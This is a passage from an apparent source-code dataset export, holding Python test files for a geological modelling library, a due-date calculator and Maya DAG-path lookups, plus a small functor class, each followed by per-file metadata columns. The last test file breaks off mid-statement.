nelements=1000,
solver='lu',
damp=True)
def test_create_stratigraphy_PLI_pyamg():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='PLI',
nelements=1000,
solver='pyamg',
damp=True)
def test_model_with_data_outside_of_bounding_box():
pass
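A sketch (not part of the original file) of how the repeated solver/interpolator tests above could be collapsed with pytest.mark.parametrize, using only the calls already exercised:
import pytest
from LoopStructural import GeologicalModel
from LoopStructural.datasets import load_claudius

@pytest.mark.parametrize("interpolator", ["FDI", "PLI"])
@pytest.mark.parametrize("solver", ["cg", "lu", "pyamg"])
def test_create_stratigraphy(interpolator, solver):
    # Same setup as the hand-written tests, driven by parameters.
    data, bb = load_claudius()
    model = GeologicalModel(bb[0, :], bb[1, :])
    model.set_model_data(data)
    model.create_and_add_foliation('s0',
                                   interpolatortype=interpolator,
                                   nelements=1000,
                                   solver=solver)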
| 37.539326
| 63
| 0.471715
| 304
| 3,341
| 4.904605
| 0.134868
| 0.080483
| 0.060362
| 0.108652
| 0.884641
| 0.859826
| 0.859826
| 0.843729
| 0.816901
| 0.816901
| 0
| 0.031562
| 0.431009
| 3,341
| 88
| 64
| 37.965909
| 0.752762
| 0
| 0
| 0.824324
| 0
| 0
| 0.016467
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.135135
| false
| 0.013514
| 0.027027
| 0
| 0.162162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4dc25b6f26d62a3d4dfa159aa616518c120a8eae
| 243
|
py
|
Python
|
homeworks/alexander_sidorov/lesson17/level08.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | null | null | null |
homeworks/alexander_sidorov/lesson17/level08.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | 8
|
2019-11-15T18:15:56.000Z
|
2020-02-03T18:05:05.000Z
|
homeworks/alexander_sidorov/lesson17/level08.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | null | null | null |
class Functor:
def __init__(self, function, args, kwargs):
self.__function = function
self.__args = args
self.__kwargs = kwargs
def __call__(self):
return self.__function(*self.__args, **self.__kwargs)
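A brief usage sketch (not part of the original file): the functor freezes a function together with its positional and keyword arguments and applies them when the instance is called:
f = Functor(print, ("hello", "world"), {"sep": ", "})
f()  # prints: hello, world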
| 27
| 61
| 0.641975
| 27
| 243
| 5.037037
| 0.37037
| 0.264706
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255144
| 243
| 8
| 62
| 30.375
| 0.751381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
422bf6203241d77a9ddf9abafd598a67ec354af3
| 4,290
|
py
|
Python
|
test/test_due_data_calculator.py
|
szabadkai/due-date-calculator
|
c1e6449593b4896b0fbb8b43b5d128ab66944fe5
|
[
"MIT"
] | null | null | null |
test/test_due_data_calculator.py
|
szabadkai/due-date-calculator
|
c1e6449593b4896b0fbb8b43b5d128ab66944fe5
|
[
"MIT"
] | null | null | null |
test/test_due_data_calculator.py
|
szabadkai/due-date-calculator
|
c1e6449593b4896b0fbb8b43b5d128ab66944fe5
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from due_date_calculator import DueDateCalculator
from freezegun import freeze_time
from datetime import datetime as dt
from datetime import timedelta
import config
class TestDueDateCalculator(TestCase):
@freeze_time('2018-10-22 12:00:01')
def setUp(self):
self.calculator = DueDateCalculator(config=config)
@freeze_time('2018-10-22 12:00:01')
def test_instantiation_with_no_args(self):
DueDateCalculator(config=config)
@freeze_time('2018-10-20 12:00:01')
def test_instantiation_fails_with_invalid_date(self):
with self.assertRaises(ValueError):
DueDateCalculator(dt.now(), config=config)
@freeze_time('2018-10-22 12:00:01')
def test_init_with_now_args_results_in_now_start(self):
calculator = DueDateCalculator(config=config)
self.assertEqual(calculator.submitted_date, dt.now())
@freeze_time('2018-10-22 12:00:01')
def test_correct_due_date_is_given_monday_super_happy_path(self):
calculator = DueDateCalculator(config=config)
self.assertEqual(calculator.due_date, dt.now() + timedelta(days=2))
@freeze_time('2018-10-19 12:00:01')
def test_calculator_handles_weekends_gracefully(self):
calculator = DueDateCalculator(config=config)
self.assertEqual(calculator.due_date, dt.now() + timedelta(days=4))
@freeze_time('2018-10-20')
def test_is_weekday(self):
self.assertFalse(self.calculator.is_weekday(dt.now()), 'Saturday')
self.assertFalse(self.calculator.is_weekday(dt.now() + timedelta(days=1)), 'Sunday')
self.assertTrue(self.calculator.is_weekday(dt.now() + timedelta(days=2)), 'Monday')
self.assertTrue(self.calculator.is_weekday(dt.now() + timedelta(days=3)) , 'Tuesday')
self.assertTrue(self.calculator.is_weekday(dt.now() + timedelta(days=4)), 'Wednesday')
self.assertTrue(self.calculator.is_weekday(dt.now() + timedelta(days=5)), 'Thursday')
self.assertTrue(self.calculator.is_weekday(dt.now() + timedelta(days=6)), 'Friday')
self.assertFalse(self.calculator.is_weekday(dt.now() + timedelta(days=7)), 'Saturday')
@freeze_time('2018-10-21')
def test_is_open_hours(self):
self.assertFalse(self.calculator.is_open_hours(dt.now()), "Too early: Midnight")
self.assertFalse(self.calculator.is_open_hours(dt.now() + timedelta(hours=6)), 'Too early: 6am')
self.assertTrue(self.calculator.is_open_hours(dt.now() + timedelta(hours=10)), 'Open: 10am')
self.assertTrue(self.calculator.is_open_hours(dt.now() + timedelta(hours=16, minutes=59)), 'Open: 5:59pm')
self.assertFalse(self.calculator.is_open_hours(dt.now() + timedelta(hours=17)), 'Too late: 6pm')
self.assertFalse(self.calculator.is_open_hours(dt.now() + timedelta(days=-2)), 'Closed: Sunday')
@freeze_time('2018-10-21')
def test_is_business_hours_on_weekend(self):
self.assertFalse(self.calculator.is_business_hour(dt.now()), "Too early: Midnight")
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=6)), 'Too early: 6am')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=10)), 'Open: 10am')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=16, minutes=59)), 'Open: 5:59pm')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=17)), 'Too late: 6pm')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(days=-2)), 'Closed: Sunday')
@freeze_time('2018-10-22')
def test_is_busines_hours_on_weekday(self):
self.assertFalse(self.calculator.is_business_hour(dt.now()), "Too early: Midnight")
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=6)), 'Too early: 6am')
self.assertTrue(self.calculator.is_business_hour(dt.now() + timedelta(hours=10)), 'Open: 10am')
self.assertTrue(self.calculator.is_business_hour(dt.now() + timedelta(hours=16, minutes=59)), 'Open: 5:59pm')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=17)), 'Too late: 6pm')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(days=-2)), 'Closed: Sunday')
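A minimal sketch (not part of the test file) of what freezegun's freeze_time, used throughout the tests above, does: inside the frozen context, datetime.now() returns the fixed timestamp instead of the real clock:
from datetime import datetime as dt
from freezegun import freeze_time

with freeze_time('2018-10-22 12:00:01'):
    assert dt.now() == dt(2018, 10, 22, 12, 0, 1)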
| 56.447368
| 118
| 0.712354
| 583
| 4,290
| 5.06175
| 0.15952
| 0.142325
| 0.140969
| 0.167062
| 0.806506
| 0.788546
| 0.773975
| 0.746865
| 0.696374
| 0.67367
| 0
| 0.047696
| 0.13986
| 4,290
| 75
| 119
| 57.2
| 0.752033
| 0
| 0
| 0.269841
| 0
| 0
| 0.10676
| 0
| 0
| 0
| 0
| 0
| 0.47619
| 1
| 0.15873
| false
| 0
| 0.095238
| 0
| 0.269841
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
423d2ce91f0ae10eb6470918a9c8f42e798c6afe
| 43,461
|
py
|
Python
|
tests/OpenMaya/test_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | 24
|
2017-01-11T15:57:46.000Z
|
2020-09-23T06:18:30.000Z
|
tests/OpenMaya/test_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | null | null | null |
tests/OpenMaya/test_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | 2
|
2017-03-06T23:52:08.000Z
|
2020-09-23T06:19:03.000Z
|
#!/usr/bin/env mayapy
import os
import sys
import unittest
import maya.standalone
from maya import OpenMaya, cmds
_HERE = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, os.path.abspath(os.path.join(_HERE, *((os.pardir,) * 2))))
import bana
import tests._util
bana.initialize()
maya.standalone.initialize()
class MDagPathTest(unittest.TestCase):
def setUp(self):
OpenMaya.MFileIO.newFile(True)
context = tests._util.Context()
master = tests._util.createTransform(context, name='master')
tests._util.createTransform(context, name='node', parent=master)
tests._util.createTransform(context, name='awesome_node', parent=master)
tests._util.createTransform(context, name='node_awesome', parent=master)
tests._util.createTransform(context, name='n0de', parent=master)
root1 = tests._util.createTransform(context, name='root_1', parent=master)
child1 = tests._util.createTransform(context, name='child_1', parent=root1)
tests._util.createTransform(context, name='node', parent=child1)
root2 = tests._util.createTransform(context, name='root_2', parent=master)
child2 = tests._util.createTransform(context, name='child_2', parent=root2)
grandchild = tests._util.createTransform(context, name='grandchild', parent=child2)
tests._util.createTransform(context, name='node', parent=grandchild)
cube, cubeShape = tests._util.createPolyCube(context, name='cube', parent=master)
intermediary1 = tests._util.createDagNode(context, 'mesh', name='intermediary1', parent=cube)
context.dg.newPlugValueBool(intermediary1.findPlug('intermediateObject'), True)
context.dg.connect(cubeShape.findPlug('outMesh'), intermediary1.findPlug('inMesh'))
intermediary2 = tests._util.createDagNode(context, 'mesh', name='intermediary2', parent=cube)
context.dg.newPlugValueBool(intermediary2.findPlug('intermediateObject'), True)
context.dg.connect(cubeShape.findPlug('outMesh'), intermediary2.findPlug('inMesh'))
template = tests._util.createDagNode(context, 'mesh', name='template', parent=cube)
context.dg.newPlugValueBool(template.findPlug('template'), True)
context.dg.connect(cubeShape.findPlug('outMesh'), template.findPlug('inMesh'))
sphere, sphereShape = tests._util.createNurbsSphere(context, name='sphere', parent=master)
circle, circleShape = tests._util.createNurbsCircle(context, name='circle', parent=master)
OpenMaya.MNamespace.addNamespace('awesome')
light = tests._util.createTransform(context, name='awesome:light', parent=master)
tests._util.createDagNode(context, 'pointLight', name='awesome:lightShape', parent=light)
context.dag.doIt()
context.dg.doIt()
cmds.projectCurve(circleShape.fullPathName(), sphereShape.fullPathName())
def test__hash__(self):
dagPath1 = OpenMaya.MDagPath.bnGet(pattern='|master|node')
dagPath2 = OpenMaya.MDagPath.bnGet(pattern='|master|node')
self.assertEqual(hash(dagPath1), hash(dagPath2))
def test__str__(self):
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|node')
self.assertEqual(str(dagPath), '|master|node')
def testBnFind(self):
dagPaths = list(OpenMaya.MDagPath.bnFind())
self.assertEqual(len(dagPaths), 37)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|front|frontShape', '|master', '|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2', '|persp', '|persp|perspShape', '|side', '|side|sideShape', '|top', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(recursive=False))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|master', '|persp', '|side', '|top'])
dagPaths = list(OpenMaya.MDagPath.bnFind(traverseUnderWorld=False))
self.assertEqual(len(dagPaths), 31)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|front|frontShape', '|master', '|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|persp', '|persp|perspShape', '|side', '|side|sideShape', '|top', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|child_*'))
self.assertEqual(len(dagPaths), 2)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1', '|master|root_2|child_2'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|child_*'))
self.assertEqual(len(dagPaths), 2)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1', '|master|root_2|child_2'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|node'))
self.assertEqual(len(dagPaths), 3)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.|node'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|*node'))
self.assertEqual(len(dagPaths), 4)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome_node', '|master|node', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|node*'))
self.assertEqual(len(dagPaths), 4)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node', '|master|node_awesome', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|n*de'))
self.assertEqual(len(dagPaths), 4)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|n0de', '|master|node', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(OpenMaya.MDagPath.bnFind(fnType=OpenMaya.MFn.kMesh))
self.assertEqual(len(dagPaths), 4)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template'])
dagPaths = list(OpenMaya.MDagPath.bnFind(fnType=OpenMaya.MFn.kNurbsSurface))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|awesome:*'))
self.assertEqual(len(dagPaths), 2)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome:light|awesome:lightShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|awesome:*|awesome:*'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light|awesome:lightShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|sphereShape->|*'))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|sphereShape->*|*Shape*'))
self.assertEqual(len(dagPaths), 2)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(OpenMaya.MDagPath.bnFind('*|*Shape*'))
self.assertEqual(len(dagPaths), 7)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front|frontShape', '|master|circle|circleShape', '|master|cube|cubeShape', '|master|sphere|sphereShape', '|persp|perspShape', '|side|sideShape', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind('*|*:*Shape*'))
self.assertEqual(len(dagPaths), 8)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front|frontShape', '|master|awesome:light|awesome:lightShape', '|master|circle|circleShape', '|master|cube|cubeShape', '|master|sphere|sphereShape', '|persp|perspShape', '|side|sideShape', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind('*->*|*:*Shape*'))
self.assertEqual(len(dagPaths), 10)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front|frontShape', '|master|awesome:light|awesome:lightShape', '|master|circle|circleShape', '|master|cube|cubeShape', '|master|sphere|sphereShape', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2', '|persp|perspShape', '|side|sideShape', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.'))
self.assertEqual(len(dagPaths), 31)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|front|frontShape', '|master', '|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|persp', '|persp|perspShape', '|side', '|side|sideShape', '|top', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.', recursive=False))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|master', '|persp', '|side', '|top'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.', traverseUnderWorld=False))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|master', '|persp', '|side', '|top'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='+'))
self.assertEqual(len(dagPaths), 37)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|front|frontShape', '|master', '|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2', '|persp', '|persp|perspShape', '|side', '|side|sideShape', '|top', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='+', recursive=False))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|master', '|persp', '|side', '|top'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='+', traverseUnderWorld=False))
self.assertEqual(len(dagPaths), 31)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|front|frontShape', '|master', '|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|persp', '|persp|perspShape', '|side', '|side|sideShape', '|top', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.|.'))
self.assertEqual(len(dagPaths), 14)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front|frontShape', '|master|awesome:light', '|master|awesome_node', '|master|circle', '|master|cube', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_2', '|master|sphere', '|persp|perspShape', '|side|sideShape', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.|.', recursive=False))
self.assertEqual(len(dagPaths), 0)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), [])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.|.', fnType=OpenMaya.MFn.kShape))
self.assertEqual(len(dagPaths), 4)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front|frontShape', '|persp|perspShape', '|side|sideShape', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='|master|sphere|sphereShape->*'))
self.assertEqual(len(dagPaths), 6)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='|master|sphere|sphereShape->|*'))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(OpenMaya.MDagPath.bnFind(recursive=False, copy=False))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertTrue(all(dagPath is dagPaths[0] for dagPath in dagPaths))
def testBnGet(self):
self.assertIsNone(OpenMaya.MDagPath.bnGet(pattern='|node'))
self.assertIsNone(OpenMaya.MDagPath.bnGet(pattern='*|node'))
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|node')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|master|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|node')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|root_1|child_1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|root_2|child_2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_2|child_2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|root_1|child_1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|root_2|child_2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_2|child_2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|root_1|child_*|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1|node')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|root_2|child_*|*|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_2|child_2|grandchild|node')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|awesome:light')
